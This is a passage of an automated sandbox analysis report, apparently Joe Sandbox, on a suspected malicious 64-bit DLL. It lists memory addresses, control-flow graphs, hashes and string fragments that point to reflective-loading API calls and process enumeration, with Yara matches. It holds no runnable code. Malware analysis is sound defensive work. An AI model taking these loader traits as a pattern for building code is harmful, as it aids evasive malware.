                                                                                                      0x7ff87c118b87
                                                                                                      0x7ff87c118b8f
                                                                                                      0x7ff87c118b97
                                                                                                      0x7ff87c118b9f
                                                                                                      0x7ff87c118ba7
                                                                                                      0x7ff87c118baf
                                                                                                      0x7ff87c118bb7
                                                                                                      0x7ff87c118bbf
                                                                                                      0x7ff87c118bc7
                                                                                                      0x7ff87c118bcf
                                                                                                      0x7ff87c118bd7
                                                                                                      0x7ff87c118bdf
                                                                                                      0x7ff87c118be7
                                                                                                      0x7ff87c118bef
                                                                                                      0x7ff87c118bf7
                                                                                                      0x7ff87c118bff
                                                                                                      0x7ff87c118c07
                                                                                                      0x7ff87c118c0f
                                                                                                      0x7ff87c118c17
                                                                                                      0x7ff87c118c1f
                                                                                                      0x7ff87c118c27
                                                                                                      0x7ff87c118c2f
                                                                                                      0x7ff87c118c37
                                                                                                      0x7ff87c118c3f
                                                                                                      0x7ff87c118c47
                                                                                                      0x7ff87c118c4f
                                                                                                      0x7ff87c118c57
                                                                                                      0x7ff87c118c5f
                                                                                                      0x7ff87c118c67
                                                                                                      0x7ff87c118c6f
                                                                                                      0x7ff87c118c77
                                                                                                      0x7ff87c118c7f
                                                                                                      0x7ff87c118c87
                                                                                                      0x7ff87c118c8f
                                                                                                      0x7ff87c118c97
                                                                                                      0x7ff87c118c9f
                                                                                                      0x7ff87c118ca7
                                                                                                      0x7ff87c118caf
                                                                                                      0x7ff87c118cb7
                                                                                                      0x7ff87c118cbf
                                                                                                      0x7ff87c118cc7
                                                                                                      0x7ff87c118ccf
                                                                                                      0x7ff87c118cd7
                                                                                                      0x7ff87c118cdf
                                                                                                      0x7ff87c118ce7
                                                                                                      0x7ff87c118cef
                                                                                                      0x7ff87c118cf7
                                                                                                      0x7ff87c118cff
                                                                                                      0x7ff87c118d07
                                                                                                      0x7ff87c118d0f
                                                                                                      0x7ff87c118d17
                                                                                                      0x7ff87c118d1f
                                                                                                      0x7ff87c118d27
                                                                                                      0x7ff87c118d2f
                                                                                                      0x7ff87c118d37
                                                                                                      0x7ff87c118d3f
                                                                                                      0x7ff87c118d47
                                                                                                      0x7ff87c118d4f
                                                                                                      0x7ff87c118d57
                                                                                                      0x7ff87c118d5f
                                                                                                      0x7ff87c118d67
                                                                                                      0x7ff87c118d6f
                                                                                                      0x7ff87c118d77
                                                                                                      0x7ff87c118d7f
                                                                                                      0x7ff87c118d87
                                                                                                      0x7ff87c118d8f
                                                                                                      0x7ff87c118d97
                                                                                                      0x7ff87c118d9f
                                                                                                      0x7ff87c118da7
                                                                                                      0x7ff87c118daf
                                                                                                      0x7ff87c118db7
                                                                                                      0x7ff87c118dbf
                                                                                                      0x7ff87c118dc7
                                                                                                      0x7ff87c118dcf
                                                                                                      0x7ff87c118dd7
                                                                                                      0x7ff87c118ddf
                                                                                                      0x7ff87c118de7
                                                                                                      0x7ff87c118def
                                                                                                      0x7ff87c118df7
                                                                                                      0x7ff87c118dff
                                                                                                      0x7ff87c118e07
                                                                                                      0x7ff87c118e0f
                                                                                                      0x7ff87c118e17
                                                                                                      0x7ff87c118e1f
                                                                                                      0x7ff87c118e27
                                                                                                      0x7ff87c118e2f
                                                                                                      0x7ff87c118e37
                                                                                                      0x7ff87c118e3f
                                                                                                      0x7ff87c118e47
                                                                                                      0x7ff87c118e4f
                                                                                                      0x7ff87c118e57
                                                                                                      0x7ff87c118e5f
                                                                                                      0x7ff87c118e67
                                                                                                      0x7ff87c118e6f
                                                                                                      0x7ff87c118e77
                                                                                                      0x7ff87c118e7f
                                                                                                      0x7ff87c118e87
                                                                                                      0x7ff87c118e8f
                                                                                                      0x7ff87c118e97
                                                                                                      0x7ff87c118e9f
                                                                                                      0x7ff87c118ea7
                                                                                                      0x7ff87c118eaf
                                                                                                      0x7ff87c118eb7
                                                                                                      0x7ff87c118ebf
                                                                                                      0x7ff87c118ec7
                                                                                                      0x7ff87c118ecf
                                                                                                      0x7ff87c118ed7
                                                                                                      0x7ff87c118edf
                                                                                                      0x7ff87c118ee7
                                                                                                      0x7ff87c118eef
                                                                                                      0x7ff87c118ef7
                                                                                                      0x7ff87c118eff
                                                                                                      0x7ff87c118f07
                                                                                                      0x7ff87c118f0f
                                                                                                      0x7ff87c118f17
                                                                                                      0x7ff87c118f1f
                                                                                                      0x7ff87c118f27
                                                                                                      0x7ff87c118f2f
                                                                                                      0x7ff87c118f37
                                                                                                      0x7ff87c118f3f
                                                                                                      0x7ff87c118f47
                                                                                                      0x7ff87c118f4f
                                                                                                      0x7ff87c118f57
                                                                                                      0x7ff87c118f5f
                                                                                                      0x7ff87c118f67
                                                                                                      0x7ff87c118f6f
                                                                                                      0x7ff87c118f77
                                                                                                      0x7ff87c118f7f
                                                                                                      0x7ff87c118f87
                                                                                                      0x7ff87c118f8f
                                                                                                      0x7ff87c118f97
                                                                                                      0x7ff87c118f9f
                                                                                                      0x7ff87c118fa7
                                                                                                      0x7ff87c118faf
                                                                                                      0x7ff87c118fb7
                                                                                                      0x7ff87c118fbf
                                                                                                      0x7ff87c118fc7
                                                                                                      0x7ff87c118fcf
                                                                                                      0x7ff87c118fd7
                                                                                                      0x7ff87c118fdf
                                                                                                      0x7ff87c118fe7
                                                                                                      0x7ff87c118fef
                                                                                                      0x7ff87c118ff7
                                                                                                      0x7ff87c118fff
                                                                                                      0x7ff87c119007
                                                                                                      0x7ff87c11900f
                                                                                                      0x7ff87c119017
                                                                                                      0x7ff87c11901f
                                                                                                      0x7ff87c119027
                                                                                                      0x7ff87c11902f
                                                                                                      0x7ff87c119037
                                                                                                      0x7ff87c11903f
                                                                                                      0x7ff87c119047
                                                                                                      0x7ff87c11904f
                                                                                                      0x7ff87c119057
                                                                                                      0x7ff87c11905f
                                                                                                      0x7ff87c119067
                                                                                                      0x7ff87c11906f
                                                                                                      0x7ff87c119077
                                                                                                      0x7ff87c11907f
                                                                                                      0x7ff87c119087
                                                                                                      0x7ff87c11908f
                                                                                                      0x7ff87c119097
                                                                                                      0x7ff87c11909f
                                                                                                      0x7ff87c1190a7
                                                                                                      0x7ff87c1190af
                                                                                                      0x7ff87c1190b7
                                                                                                      0x7ff87c1190bf
                                                                                                      0x7ff87c1190c7
                                                                                                      0x7ff87c1190cf
                                                                                                      0x7ff87c1190d7
                                                                                                      0x7ff87c1190df
                                                                                                      0x7ff87c1190e7
                                                                                                      0x7ff87c1190ef
                                                                                                      0x7ff87c1190f7
                                                                                                      0x7ff87c1190ff
                                                                                                      0x7ff87c119107
                                                                                                      0x7ff87c11910f
                                                                                                      0x7ff87c119117
                                                                                                      0x7ff87c11911f
                                                                                                      0x7ff87c119127
                                                                                                      0x7ff87c11912f
                                                                                                      0x7ff87c119137
                                                                                                      0x7ff87c11913f
                                                                                                      0x7ff87c119147
                                                                                                      0x7ff87c11914f
                                                                                                      0x7ff87c119157
                                                                                                      0x7ff87c11915f
                                                                                                      0x7ff87c119167
                                                                                                      0x7ff87c11916f
                                                                                                      0x7ff87c119177
                                                                                                      0x7ff87c11917f
                                                                                                      0x7ff87c119187
                                                                                                      0x7ff87c11918f
                                                                                                      0x7ff87c119197
                                                                                                      0x7ff87c11919f
                                                                                                      0x7ff87c1191a7
                                                                                                      0x7ff87c1191af
                                                                                                      0x7ff87c1191b7
                                                                                                      0x7ff87c1191bf
                                                                                                      0x7ff87c1191c7
                                                                                                      0x7ff87c1191cf
                                                                                                      0x7ff87c1191d7
                                                                                                      0x7ff87c1191df
                                                                                                      0x7ff87c1191e7
                                                                                                      0x7ff87c1191f8
                                                                                                      0x7ff87c119200
                                                                                                      0x7ff87c119205
                                                                                                      0x7ff87c119212
                                                                                                      0x7ff87c11921a
                                                                                                      0x7ff87c119224
                                                                                                      0x7ff87c11923e
                                                                                                      0x7ff87c119240
                                                                                                      0x7ff87c119248
                                                                                                      0x7ff87c11924a
                                                                                                      0x7ff87c119257
                                                                                                      0x7ff87c119263
                                                                                                      0x7ff87c119270
                                                                                                      0x7ff87c119275
                                                                                                      0x7ff87c11927c
                                                                                                      0x7ff87c119287
                                                                                                      0x7ff87c11928e
                                                                                                      0x7ff87c119294
                                                                                                      0x7ff87c11929d
                                                                                                      0x7ff87c11929f
                                                                                                      0x7ff87c1192a2
                                                                                                      0x7ff87c1192ae
                                                                                                      0x7ff87c1192b6
                                                                                                      0x7ff87c1192bb
                                                                                                      0x7ff87c1192d5
                                                                                                      0x7ff87c1192db
                                                                                                      0x7ff87c1192f5
                                                                                                      0x7ff87c119303
                                                                                                      0x7ff87c11931e
                                                                                                      0x7ff87c119320
                                                                                                      0x7ff87c119328
                                                                                                      0x7ff87c11932d
                                                                                                      0x7ff87c119330
                                                                                                      0x7ff87c119342
                                                                                                      0x7ff87c119358
                                                                                                      0x7ff87c11935f
                                                                                                      0x7ff87c11936a
                                                                                                      0x7ff87c119370
                                                                                                      0x7ff87c119372
                                                                                                      0x7ff87c119380
                                                                                                      0x7ff87c119382
                                                                                                      0x7ff87c119391
                                                                                                      0x7ff87c119396
                                                                                                      0x7ff87c11939e
                                                                                                      0x7ff87c1193a5
                                                                                                      0x7ff87c1193b8
                                                                                                      0x7ff87c1193bd
                                                                                                      0x7ff87c1193d0
                                                                                                      0x7ff87c1193d5
                                                                                                      0x7ff87c1193e1
                                                                                                      0x7ff87c119401

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $ $ $ $ $ $ $ $ $ $ $ $!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$'$'$'$'$'$'$'$'$'$'$'$'$'$($($($($($($($($($($($($($($($)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$-$-$-$-$-$-$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$0$0$0$0$0$0$0$0$0$1$1$1$1$1$1$1$1$1$1$1$1$1$2$2$2$2$2$2$2$2$2$2$2$3$3$3$3$3$3$3$3$3$3$3$3$4$4$4$4$4$4$4$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$6$6$6$6$6$6$6$6$7$7$7$7$7$7$8$8$8$8$8$8$8$8$8$8$8$8$8$9$9$9$9$9$9$9$9$9$9$9$9$:$:$:$:$:$:$;$;$;$;$;$;$;$;$;$;$;$;$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$=$=$=$=$=$=$>$>$>$>$>$>$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$@$@$@$@$@$@$@$@$A$A$A$A$A$A$A$B$B$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$D$D$D$D$D$D$E$E$E$E$E$E$E$F$F$F$F$F$F$G$G$G$G$G$G$G$G$G$G$G$H$H$H$H$H$H$H$H$H$I$I$I$I$I$I$I$I$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$K$K$K$K$K$K$K$K$K$K$K$L$L$L$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$N$N$N$N$N$N$N$N$N$N$N$N$N$O$O$O$O$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$Q$Q$Q$Q$Q$R$R$R$R$R$R$R$R$S$S$S$S$S$S$T$T$T$T$T$T$T$T$T$T$T$T$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$W$W$W$W$W$W$W$X$X$X$X$X$X$X$X$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$[$[$[$[$[$[$[$[$[$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$]$]$]$]$]$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$_$_$_$_$_$_$`$`$`$`$`$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$f$f$f$f$f$f$f$f$f$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$q$q$q$q$q$q$q$q$q$q$q$q$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$v$v$v$v$v$v$v$v$v$v$w$w$w$w$w$w$w$w$w$w$w$w$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z${${${${${${${${${${${${$|$|$|$|$|$|$|$|$|$|$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~
                                                                                                      • API String ID: 0-872547024
                                                                                                      • Opcode ID: c6f11ac01cd25e5a832513a9fe89d775d122b9a7f78f41ae8ad8edaa33a11b99
                                                                                                      • Instruction ID: 858c04658e9bd5cfdbbdf0f8453f17c4fb93009d8263aec933ce3c1422668745
                                                                                                      • Opcode Fuzzy Hash: c6f11ac01cd25e5a832513a9fe89d775d122b9a7f78f41ae8ad8edaa33a11b99
                                                                                                      • Instruction Fuzzy Hash: 37A36E1250DBC1C9E332C23CB45878FAE8193A3319F484299D3E41AADBC7AE8155DF67
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 53 2c3232a0000-2c3232a029a call 2c3232a091c * 2 66 2c3232a02a0-2c3232a02a4 53->66 67 2c3232a0905 53->67 66->67 68 2c3232a02aa-2c3232a02ae 66->68 69 2c3232a0907-2c3232a091a 67->69 68->67 70 2c3232a02b4-2c3232a02b8 68->70 70->67 71 2c3232a02be-2c3232a02c5 70->71 71->67 72 2c3232a02cb-2c3232a02dc 71->72 72->67 73 2c3232a02e2-2c3232a02eb 72->73 73->67 74 2c3232a02f1-2c3232a02fc 73->74 74->67 75 2c3232a0302-2c3232a0312 74->75 76 2c3232a033f-2c3232a0371 GetNativeSystemInfo 75->76 77 2c3232a0314-2c3232a031a 75->77 76->67 79 2c3232a0377-2c3232a0393 VirtualAlloc 76->79 78 2c3232a031c-2c3232a0324 77->78 80 2c3232a032c-2c3232a032d 78->80 81 2c3232a0326-2c3232a032a 78->81 82 2c3232a0395-2c3232a03a8 79->82 83 2c3232a03aa-2c3232a03ae 79->83 84 2c3232a032f-2c3232a033d 80->84 81->84 82->83 85 2c3232a03dc-2c3232a03e3 83->85 86 2c3232a03b0-2c3232a03c2 83->86 84->76 84->78 87 2c3232a03fb-2c3232a0417 85->87 88 2c3232a03e5-2c3232a03f9 85->88 90 2c3232a03d4-2c3232a03d8 86->90 93 2c3232a0419-2c3232a041a 87->93 94 2c3232a0458-2c3232a0465 87->94 88->87 88->88 91 2c3232a03c4-2c3232a03d1 90->91 92 2c3232a03da 90->92 91->90 92->87 95 2c3232a041c-2c3232a0422 93->95 96 2c3232a046b-2c3232a0472 94->96 97 2c3232a0537-2c3232a0542 94->97 98 2c3232a0424-2c3232a0446 95->98 99 2c3232a0448-2c3232a0456 95->99 96->97 102 2c3232a0478-2c3232a0485 96->102 100 2c3232a06e6-2c3232a06ed 97->100 101 2c3232a0548-2c3232a0559 97->101 98->98 98->99 99->94 99->95 105 2c3232a07ac-2c3232a07c3 100->105 106 2c3232a06f3-2c3232a0707 100->106 103 2c3232a0562-2c3232a0565 101->103 102->97 104 2c3232a048b-2c3232a048f 102->104 107 2c3232a055b-2c3232a055f 103->107 108 2c3232a0567-2c3232a0574 103->108 109 2c3232a051b-2c3232a0525 104->109 112 2c3232a07c9-2c3232a07cd 105->112 113 2c3232a087a-2c3232a088d 105->113 110 2c3232a070d 106->110 111 2c3232a07a9-2c3232a07aa 106->111 107->103 117 2c3232a060d-2c3232a0619 108->117 118 2c3232a057a-2c3232a057d 108->118 115 2c3232a052b-2c3232a0531 109->115 116 2c3232a0494-2c3232a04a8 109->116 119 2c3232a0712-2c3232a0736 110->119 111->105 114 2c3232a07d0-2c3232a07d3 112->114 129 2c3232a088f-2c3232a089a 113->129 130 2c3232a08b3-2c3232a08ba 113->130 120 2c3232a085f-2c3232a086d 114->120 121 2c3232a07d9-2c3232a07e9 114->121 115->97 115->104 124 2c3232a04cf-2c3232a04d3 116->124 125 2c3232a04aa-2c3232a04cd 116->125 122 2c3232a06e2-2c3232a06e3 117->122 123 2c3232a061f 117->123 118->117 126 2c3232a0583-2c3232a059b 118->126 141 2c3232a0796-2c3232a079f 119->141 142 2c3232a0738-2c3232a073e 119->142 120->114 134 2c3232a0873-2c3232a0874 120->134 131 2c3232a080d-2c3232a080f 121->131 132 2c3232a07eb-2c3232a07ed 121->132 122->100 133 2c3232a0625-2c3232a0648 123->133 136 2c3232a04d5-2c3232a04e1 124->136 137 2c3232a04e3-2c3232a04e7 124->137 135 2c3232a0518-2c3232a0519 125->135 126->117 138 2c3232a059d-2c3232a059e 126->138 143 2c3232a08ab-2c3232a08b1 129->143 148 2c3232a08eb-2c3232a0903 130->148 149 2c3232a08bc-2c3232a08c4 130->149 150 2c3232a0811-2c3232a0820 131->150 151 2c3232a0822-2c3232a082b 131->151 146 2c3232a07fb-2c3232a080b 132->146 147 2c3232a07ef-2c3232a07f9 132->147 164 2c3232a06b2-2c3232a06b7 133->164 165 2c3232a064a-2c3232a064b 133->165 134->113 135->109 139 2c3232a0511-2c3232a0515 136->139 144 2c3232a04fe-2c3232a0502 137->144 145 2c3232a04e9-2c3232a04fc 137->145 140 2c3232a05a0-2c3232a0605 138->140 139->135 140->140 154 2c3232a0607 140->154 141->119 160 2c3232a07a5-2c3232a07a6 141->160 155 2c3232a0740-2c3232a0746 142->155 156 2c3232a0748-2c3232a0754 142->156 143->130 157 2c3232a089c-2c3232a08a8 143->157 144->135 152 2c3232a0504-2c3232a050e 144->152 145->139 153 2c3232a082e-2c3232a083d 146->153 147->153 148->69 149->148 159 2c3232a08c6-2c3232a08e9 RtlAvlRemoveNode 149->159 150->153 151->153 152->139 166 2c3232a084b-2c3232a085c VirtualProtect 153->166 167 2c3232a083f-2c3232a0845 153->167 154->117 161 2c3232a077b-2c3232a078d 155->161 162 2c3232a0756-2c3232a0757 156->162 163 2c3232a0764-2c3232a0776 156->163 157->143 159->148 160->111 161->141 180 2c3232a078f-2c3232a0794 161->180 172 2c3232a0759-2c3232a0762 162->172 163->161 169 2c3232a06ce-2c3232a06d8 164->169 170 2c3232a06b9-2c3232a06bd 164->170 173 2c3232a064e-2c3232a0651 165->173 166->120 167->166 169->133 175 2c3232a06de-2c3232a06df 169->175 170->169 174 2c3232a06bf-2c3232a06c3 170->174 172->163 172->172 177 2c3232a065b-2c3232a0666 173->177 178 2c3232a0653-2c3232a0659 173->178 174->169 179 2c3232a06c5 174->179 175->122 182 2c3232a0676-2c3232a0688 177->182 183 2c3232a0668-2c3232a0669 177->183 181 2c3232a068d-2c3232a06a3 178->181 179->169 180->142 186 2c3232a06ac 181->186 187 2c3232a06a5-2c3232a06aa 181->187 182->181 184 2c3232a066b-2c3232a0674 183->184 184->182 184->184 186->164 187->173
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320718873.000002C3232A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002C3232A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2c3232a0000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$AllocInfoNativeNodeProtectRemoveSystem
                                                                                                      • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                      • API String ID: 1419936716-3605381585
                                                                                                      • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                      • Instruction ID: 902cb2d9250e2a985d75d9b22eaaba7d95231f0846adac36b065b1909e679188
                                                                                                      • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                      • Instruction Fuzzy Hash: E562F830618B488BEB59DF18D889BBDB7E4FB58304F14861DD88EC7251DB34E946CB86
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 469 180004ddc-180004e09 470 180004e0b 469->470 471 180004e10-180004e12 470->471 472 180004e18-180004e1e 471->472 473 1800050ff-1800051e5 call 180028b8c 471->473 474 180004e24-180004e2a 472->474 475 180005017-1800050fa call 180009144 * 2 472->475 483 1800051f6 473->483 484 1800051e7-1800051f1 473->484 477 1800052e9-180005382 call 18001fa08 * 2 474->477 478 180004e30-180004e36 474->478 475->470 494 180005387-180005391 477->494 481 180005211-1800052e4 call 180005ca8 478->481 482 180004e3c-180004e42 478->482 481->494 487 180004e48-180004f3f call 18000eac4 call 1800212dc 482->487 488 180005200-180005206 482->488 489 1800051fb 483->489 484->470 501 180004f44-180005012 call 180002094 487->501 488->494 495 18000520c 488->495 489->488 495->471 501->489
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @_$Q+$w$+$3C$u
                                                                                                      • API String ID: 0-4152583413
                                                                                                      • Opcode ID: 9f8a14a22d69b5951a2631c0067e0fc4d36d0f639cba0d102428ca4f006b14de
                                                                                                      • Instruction ID: b6ea412dc30f19c74fb4b1663690e8dc750e0b49b1240d0c045de5a6b9424b82
                                                                                                      • Opcode Fuzzy Hash: 9f8a14a22d69b5951a2631c0067e0fc4d36d0f639cba0d102428ca4f006b14de
                                                                                                      • Instruction Fuzzy Hash: 7D02F67151038DEFDB98DF24C889ADD3BA1FB58398F952219FC0A972A0C774D985CB84
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 3m$SW$rS$r$t.?8
                                                                                                      • API String ID: 0-4220278859
                                                                                                      • Opcode ID: 85a6ee6c84f7a60e958ee75f08787c2d87ed4ffb25c6bd77534bac28b26f7971
                                                                                                      • Instruction ID: 5729ab1ff226baa14ab4ffc9551888db56205bfd96deea9119b6bbc9091883bb
                                                                                                      • Opcode Fuzzy Hash: 85a6ee6c84f7a60e958ee75f08787c2d87ed4ffb25c6bd77534bac28b26f7971
                                                                                                      • Instruction Fuzzy Hash: F2C1EF7151A784ABD388DF28C5CA95BBBE1FBC4744F906A1DF496862A0D7B4D908CF02
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 572 180005db4-180005e1d call 180011408 575 180005e22-180005e27 572->575 576 1800060e2-1800060f3 call 18000bf58 575->576 577 180005e2d-180005e32 575->577 588 1800060f5-1800060fa 576->588 589 1800060ff 576->589 579 180006063-1800060d8 call 18001b204 577->579 580 180005e38-180005e3d 577->580 585 1800060dd Process32FirstW 579->585 581 180005e43-180005e48 580->581 582 180005f89-180006047 call 180005be0 580->582 586 180005ef5-180005f74 call 18001b898 581->586 587 180005e4e-180005e53 581->587 595 18000604c-180006053 582->595 585->576 599 180005f79-180005f84 586->599 591 180005ee6-180005ef0 587->591 592 180005e59-180005e5b 587->592 588->575 593 180006101-180006106 589->593 591->575 592->593 596 180005e61-180005ec8 call 18000fe88 592->596 597 18000610c 593->597 598 180005ecd-180005ee5 593->598 595->598 600 180006059-18000605e 595->600 596->598 597->575 599->575 600->575
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 9$>$Qz$cG$iP.
                                                                                                      • API String ID: 0-2314038544
                                                                                                      • Opcode ID: 4158940623df5b63cf90af9ecb6c971ef7c92bce548850bfcd4728ba9d0de4d2
                                                                                                      • Instruction ID: 2738067ee2515d3e4966bb770307c21824dc71e1dd538b0d2de93925eb972619
                                                                                                      • Opcode Fuzzy Hash: 4158940623df5b63cf90af9ecb6c971ef7c92bce548850bfcd4728ba9d0de4d2
                                                                                                      • Instruction Fuzzy Hash: 57815D701497888BEBE8DF24C8C5BDA7BE1FB88344F50551DF88A8B290CB75DA44CB41
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
